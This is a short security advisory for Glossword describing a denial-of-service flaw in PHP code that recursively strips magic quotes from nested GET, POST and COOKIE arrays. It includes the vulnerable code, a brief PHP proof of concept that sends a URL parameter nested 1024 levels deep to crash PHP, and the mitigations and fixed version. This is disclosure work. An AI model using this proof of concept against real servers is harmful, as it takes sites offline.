SummaryIncorrectly filtered incoming URL parameters when magic_quotes_gpc is enabled. DescriptionTo deal with magic quotes normalization, PHP-developers need to parse each incoming variable with function stripslashes. When incoming variable is an array, this array should be parsed as well. <?php
if ( function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc() )
{
function strip_quotes( &$var )
{
if (is_array($var))
{
array_walk($var, 'strip_quotes');
}
else
{
$var = stripslashes($var);
}
}
foreach (array('GET','POST','COOKIE') as $v)
{
/* checking $_GET['variable'] */
if ( !empty(${"_".$v}) )
{
array_walk(${"_".$v}, 'strip_quotes');
}
}
}
?>The code above works, but it can be exploited remotely, due to its usage of recursive functions. <?php
/* create string [][][][][]... */
$query = str_repeat("[]", 1024);
/* create url index.php?a[][][][][]...[]=1 */
$url = "http://domain.tld/index.php?a{$query}=1";
/* Open url */
file_get_contents($url);
?> It will take all available memory, followed by PHP crash. PHP 5.2.2 has a limiter that restricts depth of input arrays. max_input_nesting_level = 64 At the default value it'll prevent creation of input arrays with >64 dimensions. The maximum nesting level of arrays in Glossword is 10 and it is not required to have PHP 5.2.2 or above (while it is highly recommended). SeveritySerious. Affected versionsPHP versions before 5.2.2 with enabled magic_quotes_gpc. Glossword versions before 1.8.7 SolutionDisable magic_quotes_gpc in php.ini. Update Glossword up to version 1.8.7. No PHP updates required. References
|
